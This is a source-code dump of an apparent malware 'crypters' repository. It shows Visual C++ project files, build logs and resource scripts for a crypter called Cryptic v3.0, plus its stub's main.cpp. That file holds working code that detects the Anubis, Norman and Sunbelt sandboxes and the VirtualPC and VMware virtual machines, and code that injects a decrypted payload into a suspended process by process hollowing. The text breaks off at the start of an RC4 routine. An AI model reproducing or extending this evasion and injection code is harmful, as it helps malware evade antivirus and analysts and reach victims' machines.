├── Cryptic v3.0
└── Cryptic v3.0
│ └── Cryptic v3.0
│ ├── Cryptic.dsp
│ ├── Cryptic.dsw
│ ├── Cryptic.ncb
│ ├── Cryptic.opt
│ ├── Cryptic.plg
│ ├── Cryptic.rc
│ ├── Stub
│ ├── Stub.aps
│ ├── Stub.dsp
│ ├── Stub.dsw
│ ├── Stub.ncb
│ ├── Stub.opt
│ ├── Stub.plg
│ ├── main.cpp
│ ├── resource.h
│ └── stub.rc
│ ├── XPThemes.manifest
│ ├── cryptic.bmp
│ ├── exe.ico
│ ├── main.cpp
│ ├── resource.h
│ └── skull.ico
├── DrIdle_crypter
├── MyEncrypter
│ ├── MyEncrypter.sln
│ ├── MyEncrypter.suo
│ └── MyEncrypter
│ │ ├── MyEncrypter.cpp
│ │ ├── MyEncrypter.vcxproj
│ │ ├── MyEncrypter.vcxproj.filters
│ │ ├── MyEncrypter.vcxproj.user
│ │ ├── aes256.cpp
│ │ ├── aes256.h
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
└── MyStub
│ ├── MyStub.sln
│ ├── MyStub.suo
│ └── MyStub
│ ├── MyStub.cpp
│ ├── MyStub.vcxproj
│ ├── MyStub.vcxproj.filters
│ ├── MyStub.vcxproj.user
│ ├── Resource.h
│ ├── aes256.cpp
│ ├── aes256.h
│ ├── resourcemanager.cpp
│ ├── resourcemanager.h
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
└── xProtect Source
├── build.cpp
├── build.h
├── main.cpp
├── readme.txt
├── stub.cpp
└── stub.h
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.dsp:
--------------------------------------------------------------------------------
1 | # Microsoft Developer Studio Project File - Name="Cryptic" - Package Owner=<4>
2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
3 | # ** DO NOT EDIT **
4 |
5 | # TARGTYPE "Win32 (x86) Application" 0x0101
6 |
7 | CFG=Cryptic - Win32 Debug
8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE
11 | !MESSAGE NMAKE /f "Cryptic.mak".
12 | !MESSAGE
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE
16 | !MESSAGE NMAKE /f "Cryptic.mak" CFG="Cryptic - Win32 Debug"
17 | !MESSAGE
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE
20 | !MESSAGE "Cryptic - Win32 Release" (based on "Win32 (x86) Application")
21 | !MESSAGE "Cryptic - Win32 Debug" (based on "Win32 (x86) Application")
22 | !MESSAGE
23 |
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | MTL=midl.exe
30 | RSC=rc.exe
31 |
32 | !IF "$(CFG)" == "Cryptic - Win32 Release"
33 |
34 | # PROP BASE Use_MFC 0
35 | # PROP BASE Use_Debug_Libraries 0
36 | # PROP BASE Output_Dir "Release"
37 | # PROP BASE Intermediate_Dir "Release"
38 | # PROP BASE Target_Dir ""
39 | # PROP Use_MFC 0
40 | # PROP Use_Debug_Libraries 0
41 | # PROP Output_Dir "Release"
42 | # PROP Intermediate_Dir "Release"
43 | # PROP Ignore_Export_Lib 0
44 | # PROP Target_Dir ""
45 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
46 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
47 | # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
48 | # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
49 | # ADD BASE RSC /l 0x816 /d "NDEBUG"
50 | # ADD RSC /l 0x816 /d "NDEBUG"
51 | BSC32=bscmake.exe
52 | # ADD BASE BSC32 /nologo
53 | # ADD BSC32 /nologo
54 | LINK32=link.exe
55 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /machine:I386
56 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib comctl32.lib msvcrt.lib /nologo /subsystem:windows /machine:I386 /nodefaultlib /opt:nowin98
57 | # SUBTRACT LINK32 /pdb:none
58 |
59 | !ELSEIF "$(CFG)" == "Cryptic - Win32 Debug"
60 |
61 | # PROP BASE Use_MFC 0
62 | # PROP BASE Use_Debug_Libraries 1
63 | # PROP BASE Output_Dir "Debug"
64 | # PROP BASE Intermediate_Dir "Debug"
65 | # PROP BASE Target_Dir ""
66 | # PROP Use_MFC 0
67 | # PROP Use_Debug_Libraries 1
68 | # PROP Output_Dir "Debug"
69 | # PROP Intermediate_Dir "Debug"
70 | # PROP Target_Dir ""
71 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
72 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
73 | # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
74 | # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
75 | # ADD BASE RSC /l 0x816 /d "_DEBUG"
76 | # ADD RSC /l 0x816 /d "_DEBUG"
77 | BSC32=bscmake.exe
78 | # ADD BASE BSC32 /nologo
79 | # ADD BSC32 /nologo
80 | LINK32=link.exe
81 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
82 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
83 |
84 | !ENDIF
85 |
86 | # Begin Target
87 |
88 | # Name "Cryptic - Win32 Release"
89 | # Name "Cryptic - Win32 Debug"
90 | # Begin Group "Source Files"
91 |
92 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
93 | # Begin Source File
94 |
95 | SOURCE=.\cryptic.rc
96 | # End Source File
97 | # Begin Source File
98 |
99 | SOURCE=.\main.cpp
100 | # End Source File
101 | # End Group
102 | # Begin Group "Header Files"
103 |
104 | # PROP Default_Filter "h;hpp;hxx;hm;inl"
105 | # End Group
106 | # Begin Group "Resource Files"
107 |
108 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
109 | # Begin Source File
110 |
111 | SOURCE=.\cryptic.bmp
112 | # End Source File
113 | # Begin Source File
114 |
115 | SOURCE=.\exe.ico
116 | # End Source File
117 | # Begin Source File
118 |
119 | SOURCE=.\skull.ico
120 | # End Source File
121 | # End Group
122 | # Begin Source File
123 |
124 | SOURCE=.\Stub\Release\Stub.exe
125 | # End Source File
126 | # Begin Source File
127 |
128 | SOURCE=.\XPThemes.manifest
129 | # End Source File
130 | # End Target
131 | # End Project
132 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "Cryptic"=".\Cryptic.dsp" - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.ncb
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.opt
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.plg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Build Log
5 |
6 | --------------------Configuration: Cryptic - Win32 Release--------------------
7 |
8 | Command Lines
9 |
10 |
11 |
12 | Results
13 | Cryptic.exe - 0 error(s), 0 warning(s)
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.rc:
--------------------------------------------------------------------------------
1 | //Microsoft Developer Studio generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "afxres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // Portuguese (Portugal) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_PTG)
19 | #ifdef _WIN32
20 | LANGUAGE LANG_PORTUGUESE, SUBLANG_PORTUGUESE
21 | #pragma code_page(1252)
22 | #endif //_WIN32
23 |
24 | #ifdef APSTUDIO_INVOKED
25 | /////////////////////////////////////////////////////////////////////////////
26 | //
27 | // TEXTINCLUDE
28 | //
29 |
30 | 1 TEXTINCLUDE DISCARDABLE
31 | BEGIN
32 | "resource.h\0"
33 | END
34 |
35 | 2 TEXTINCLUDE DISCARDABLE
36 | BEGIN
37 | "#include ""afxres.h""\r\n"
38 | "\0"
39 | END
40 |
41 | 3 TEXTINCLUDE DISCARDABLE
42 | BEGIN
43 | "\r\n"
44 | "\0"
45 | END
46 |
47 | #endif // APSTUDIO_INVOKED
48 |
49 |
50 | /////////////////////////////////////////////////////////////////////////////
51 | //
52 | // Dialog
53 | //
54 |
55 | IDD_MAIN DIALOGEX 0, 0, 265, 95
56 | STYLE DS_MODALFRAME | DS_CENTER | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION |
57 | WS_SYSMENU
58 | EXSTYLE WS_EX_ACCEPTFILES
59 | CAPTION "Cryptic v3.0"
60 | FONT 8, "Tahoma"
61 | BEGIN
62 | CONTROL 102,IDC_STATIC,"Static",SS_BITMAP,0,0,265,25
63 | GROUPBOX "",IDC_STATIC,0,25,265,65
64 | LTEXT "File:",IDC_STATIC,5,35,15,8
65 | EDITTEXT IDC_FILE,25,35,180,15,ES_AUTOHSCROLL
66 | PUSHBUTTON "Browse...",IDC_BROWSE,210,35,50,15
67 | CONTROL "Create backup copy (*.bak)",IDC_BACKUP,"Button",
68 | BS_AUTOCHECKBOX | WS_TABSTOP,5,55,105,8
69 | CONTROL "Add icon",IDC_ADDICON,"Button",BS_AUTOCHECKBOX |
70 | WS_TABSTOP,115,55,40,8
71 | ICON IDI_EXE,IDC_ICONIMG,160,55,20,20
72 | PUSHBUTTON "Build",IDC_BUILD,5,70,50,15
73 | PUSHBUTTON "About",IDC_ABOUT,60,70,50,15
74 | PUSHBUTTON "Exit",IDC_EXIT,210,70,50,15
75 | END
76 |
77 |
78 | /////////////////////////////////////////////////////////////////////////////
79 | //
80 | // DESIGNINFO
81 | //
82 |
83 | #ifdef APSTUDIO_INVOKED
84 | GUIDELINES DESIGNINFO DISCARDABLE
85 | BEGIN
86 | IDD_MAIN, DIALOG
87 | BEGIN
88 | LEFTMARGIN, 7
89 | RIGHTMARGIN, 258
90 | TOPMARGIN, 7
91 | BOTTOMMARGIN, 88
92 | END
93 | END
94 | #endif // APSTUDIO_INVOKED
95 |
96 |
97 | /////////////////////////////////////////////////////////////////////////////
98 | //
99 | // Bitmap
100 | //
101 |
102 | IDB_MAIN BITMAP DISCARDABLE "cryptic.bmp"
103 |
104 | /////////////////////////////////////////////////////////////////////////////
105 | //
106 | // Icon
107 | //
108 |
109 | // Icon with lowest ID value placed first to ensure application icon
110 | // remains consistent on all systems.
111 | IDI_MAIN ICON DISCARDABLE "skull.ico"
112 | IDI_EXE ICON DISCARDABLE "exe.ico"
113 |
114 | /////////////////////////////////////////////////////////////////////////////
115 | //
116 | // 24
117 | //
118 |
119 | IDR_24 24 DISCARDABLE "XPThemes.manifest"
120 |
121 | /////////////////////////////////////////////////////////////////////////////
122 | //
123 | // STUB
124 | //
125 |
126 | IDR_STUB STUB DISCARDABLE "Stub\\Release\\Stub.exe"
127 | #endif // Portuguese (Portugal) resources
128 | /////////////////////////////////////////////////////////////////////////////
129 |
130 |
131 |
132 | #ifndef APSTUDIO_INVOKED
133 | /////////////////////////////////////////////////////////////////////////////
134 | //
135 | // Generated from the TEXTINCLUDE 3 resource.
136 | //
137 |
138 |
139 | /////////////////////////////////////////////////////////////////////////////
140 | #endif // not APSTUDIO_INVOKED
141 |
142 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.aps
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.dsp:
--------------------------------------------------------------------------------
1 | # Microsoft Developer Studio Project File - Name="Stub" - Package Owner=<4>
2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
3 | # ** DO NOT EDIT **
4 |
5 | # TARGTYPE "Win32 (x86) Application" 0x0101
6 |
7 | CFG=Stub - Win32 Debug
8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE
11 | !MESSAGE NMAKE /f "Stub.mak".
12 | !MESSAGE
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE
16 | !MESSAGE NMAKE /f "Stub.mak" CFG="Stub - Win32 Debug"
17 | !MESSAGE
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE
20 | !MESSAGE "Stub - Win32 Release" (based on "Win32 (x86) Application")
21 | !MESSAGE "Stub - Win32 Debug" (based on "Win32 (x86) Application")
22 | !MESSAGE
23 |
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | MTL=midl.exe
30 | RSC=rc.exe
31 |
32 | !IF "$(CFG)" == "Stub - Win32 Release"
33 |
34 | # PROP BASE Use_MFC 0
35 | # PROP BASE Use_Debug_Libraries 0
36 | # PROP BASE Output_Dir "Release"
37 | # PROP BASE Intermediate_Dir "Release"
38 | # PROP BASE Target_Dir ""
39 | # PROP Use_MFC 0
40 | # PROP Use_Debug_Libraries 0
41 | # PROP Output_Dir "Release"
42 | # PROP Intermediate_Dir "Release"
43 | # PROP Ignore_Export_Lib 0
44 | # PROP Target_Dir ""
45 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
46 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
47 | # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
48 | # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
49 | # ADD BASE RSC /l 0x816 /d "NDEBUG"
50 | # ADD RSC /l 0x816 /d "NDEBUG"
51 | BSC32=bscmake.exe
52 | # ADD BASE BSC32 /nologo
53 | # ADD BSC32 /nologo
54 | LINK32=link.exe
55 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /machine:I386
56 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib msvcrt.lib /nologo /subsystem:windows /machine:I386 /nodefaultlib /opt:nowin98
57 | # SUBTRACT LINK32 /pdb:none
58 |
59 | !ELSEIF "$(CFG)" == "Stub - Win32 Debug"
60 |
61 | # PROP BASE Use_MFC 0
62 | # PROP BASE Use_Debug_Libraries 1
63 | # PROP BASE Output_Dir "Debug"
64 | # PROP BASE Intermediate_Dir "Debug"
65 | # PROP BASE Target_Dir ""
66 | # PROP Use_MFC 0
67 | # PROP Use_Debug_Libraries 1
68 | # PROP Output_Dir "Debug"
69 | # PROP Intermediate_Dir "Debug"
70 | # PROP Target_Dir ""
71 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
72 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
73 | # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
74 | # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
75 | # ADD BASE RSC /l 0x816 /d "_DEBUG"
76 | # ADD RSC /l 0x816 /d "_DEBUG"
77 | BSC32=bscmake.exe
78 | # ADD BASE BSC32 /nologo
79 | # ADD BSC32 /nologo
80 | LINK32=link.exe
81 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
82 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
83 |
84 | !ENDIF
85 |
86 | # Begin Target
87 |
88 | # Name "Stub - Win32 Release"
89 | # Name "Stub - Win32 Debug"
90 | # Begin Group "Source Files"
91 |
92 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
93 | # Begin Source File
94 |
95 | SOURCE=.\main.cpp
96 | # End Source File
97 | # Begin Source File
98 |
99 | SOURCE=.\stub.rc
100 | # End Source File
101 | # End Group
102 | # Begin Group "Header Files"
103 |
104 | # PROP Default_Filter "h;hpp;hxx;hm;inl"
105 | # End Group
106 | # Begin Group "Resource Files"
107 |
108 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
109 | # End Group
110 | # End Target
111 | # End Project
112 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "Stub"=".\Stub.dsp" - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.ncb
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.opt
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.plg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Build Log
5 |
6 | --------------------Configuration: Stub - Win32 Release--------------------
7 |
8 | Command Lines
9 | Creating temporary file "C:\DOCUME~1\MOJEIM~1\LOCALS~1\Temp\RSP1D.tmp" with contents
10 | [
11 | /nologo /ML /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /Fp"Release/Stub.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c
12 | "C:\Documents and Settings\moje ime\Desktop\Cryptic3source\Stub\main.cpp"
13 | ]
14 | Creating command line "cl.exe @C:\DOCUME~1\MOJEIM~1\LOCALS~1\Temp\RSP1D.tmp"
15 | Output Window
16 | Compiling...
17 | main.cpp
18 |
19 |
20 |
21 | Results
22 | main.obj - 0 error(s), 0 warning(s)
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include // comment this line if you don't want to include anti-anubis
4 |
5 | typedef BOOL (WINAPI *_CreateProcess)(
6 | LPCTSTR lpApplicationName,
7 | LPTSTR lpCommandLine,
8 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
9 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
10 | BOOL bInheritHandles,
11 | DWORD dwCreationFlags,
12 | LPVOID lpEnvironment,
13 | LPCTSTR lpCurrentDirectory,
14 | LPSTARTUPINFO lpStartupInfo,
15 | LPPROCESS_INFORMATION lpProcessInformation
16 | );
17 |
18 | typedef LONG (WINAPI *_NtUnmapViewOfSection)(
19 | HANDLE ProcessHandle,
20 | PVOID BaseAddress
21 | );
22 |
23 | typedef LPVOID (WINAPI *_VirtualAllocEx)(
24 | HANDLE hProcess,
25 | LPVOID lpAddress,
26 | SIZE_T dwSize,
27 | DWORD flAllocationType,
28 | DWORD flProtect
29 | );
30 |
31 | typedef BOOL (WINAPI *_WriteProcessMemory)(
32 | HANDLE hProcess,
33 | LPVOID lpBaseAddress,
34 | LPCVOID lpBuffer,
35 | SIZE_T nSize,
36 | SIZE_T* lpNumberOfBytesWritten
37 | );
38 |
39 | typedef BOOL (WINAPI *_GetThreadContext)(
40 | HANDLE hThread,
41 | LPCONTEXT lpContext
42 | );
43 |
44 | typedef BOOL (WINAPI *_SetThreadContext)(
45 | HANDLE hThread,
46 | const CONTEXT* lpContext
47 | );
48 |
49 | typedef DWORD (WINAPI *_ResumeThread)(
50 | HANDLE hThread
51 | );
52 |
53 | PIMAGE_DOS_HEADER pidh;
54 | PIMAGE_NT_HEADERS pinh;
55 | PIMAGE_SECTION_HEADER pish;
56 |
57 | DWORD dwFileSize;
58 | LPBYTE lpFileBuffer;
59 |
60 | bool IsAnubis()
61 | {
62 | PROCESSENTRY32 pe32;
63 | pe32.dwSize = sizeof(PROCESSENTRY32);
64 | DWORD PID = 0, PPID = 0, expPID = 0;
65 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
66 | if(Process32First(hSnapshot, &pe32))
67 | {
68 | while(Process32Next(hSnapshot, &pe32))
69 | {
70 | PID = pe32.th32ProcessID;
71 | if(PID == GetCurrentProcessId())
72 | {
73 | PPID = pe32.th32ParentProcessID;
74 | }
75 | if(!strcmp(pe32.szExeFile, "explorer.exe"))
76 | {
77 | expPID = pe32.th32ProcessID;
78 | }
79 | }
80 | CloseHandle(hSnapshot);
81 | }
82 | if(PPID != expPID)
83 | {
84 | return TRUE;
85 | }
86 | else
87 | {
88 | return FALSE;
89 | }
90 | }
91 |
92 | bool IsNormanSandBox()
93 | {
94 | CHAR szUserName[MAX_PATH];
95 | DWORD dwUserNameSize = sizeof(szUserName);
96 | GetUserName(szUserName, &dwUserNameSize);
97 | if(!strcmp(szUserName, "CurrentUser"))
98 | {
99 | return TRUE;
100 | }
101 | else
102 | {
103 | return FALSE;
104 | }
105 | }
106 |
107 | bool IsSunbeltSandBox()
108 | {
109 | CHAR szFileName[MAX_PATH];
110 | GetModuleFileName(NULL, szFileName, MAX_PATH);
111 | if(!strcmp(szFileName, "C:\\file.exe"))
112 | {
113 | return TRUE;
114 | }
115 | else
116 | {
117 | return FALSE;
118 | }
119 | }
120 |
121 | bool IsVirtualPC()
122 | {
123 | __try
124 | {
125 | __asm
126 | {
127 | mov eax, 1
128 | _emit 0x0F
129 | _emit 0x3F
130 | _emit 0x07
131 | _emit 0x0B
132 | _emit 0xC7
133 | _emit 0x45
134 | _emit 0xFC
135 | _emit 0xFF
136 | _emit 0xFF
137 | _emit 0xFF
138 | _emit 0xFF
139 | }
140 | }
141 | __except(1)
142 | {
143 | return FALSE;
144 | }
145 | return TRUE;
146 | }
147 |
148 | bool IsVMware()
149 | {
150 | DWORD _EBX;
151 | __try
152 | {
153 | __asm
154 | {
155 | push ebx
156 | mov eax, 0x564D5868
157 | mov ebx, 0x8685D465
158 | mov ecx, 0x0A
159 | mov dx, 0x5658
160 | in eax, dx
161 | mov _EBX, ebx
162 | pop ebx
163 | }
164 | }
165 | __except(1)
166 | {
167 | return FALSE;
168 | }
169 | return _EBX == 0x564D5868;
170 | }
171 |
172 | VOID InjectPE(LPSTR szProcessName, LPBYTE lpBuffer)
173 | {
174 | STARTUPINFO si;
175 | PROCESS_INFORMATION pi;
176 | CONTEXT ctx;
177 | memset(&si, 0, sizeof(si));
178 | si.cb = sizeof(STARTUPINFO);
179 | ctx.ContextFlags = CONTEXT_FULL;
180 | pidh = (PIMAGE_DOS_HEADER)&lpBuffer[0];
181 | if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
182 | {
183 | return;
184 | }
185 | pinh = (PIMAGE_NT_HEADERS)&lpBuffer[pidh->e_lfanew];
186 | if(pinh->Signature != IMAGE_NT_SIGNATURE)
187 | {
188 | return;
189 | }
190 | _CreateProcess __CreateProcess = NULL;
191 | __CreateProcess = (_CreateProcess)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateProcessA");
192 | _NtUnmapViewOfSection __NtUnmapViewOfSection = NULL;
193 | __NtUnmapViewOfSection = (_NtUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection");
194 | _VirtualAllocEx __VirtualAllocEx = NULL;
195 | __VirtualAllocEx = (_VirtualAllocEx)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
196 | _WriteProcessMemory __WriteProcessMemory = NULL;
197 | __WriteProcessMemory = (_WriteProcessMemory)GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
198 | _GetThreadContext __GetThreadContext = NULL;
199 | __GetThreadContext = (_GetThreadContext)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetThreadContext");
200 | _SetThreadContext __SetThreadContext = NULL;
201 | __SetThreadContext = (_SetThreadContext)GetProcAddress(GetModuleHandle("kernel32.dll"), "SetThreadContext");
202 | _ResumeThread __ResumeThread = NULL;
203 | __ResumeThread = (_ResumeThread)GetProcAddress(GetModuleHandle("kernel32.dll"), "ResumeThread");
204 | __CreateProcess(NULL, szProcessName, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
205 | __NtUnmapViewOfSection(pi.hProcess, (PVOID)pinh->OptionalHeader.ImageBase);
206 | __VirtualAllocEx(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
207 | __WriteProcessMemory(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, &lpBuffer[0], pinh->OptionalHeader.SizeOfHeaders, NULL);
208 | for(INT i = 0; i < pinh->FileHeader.NumberOfSections; i++)
209 | {
210 | pish = (PIMAGE_SECTION_HEADER)&lpBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i];
211 | __WriteProcessMemory(pi.hProcess, (LPVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress), &lpBuffer[pish->PointerToRawData], pish->SizeOfRawData, NULL);
212 | }
213 | __GetThreadContext(pi.hThread, &ctx);
214 | ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
215 | __SetThreadContext(pi.hThread, &ctx);
216 | __ResumeThread(pi.hThread);
217 | }
218 |
219 | LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
220 | {
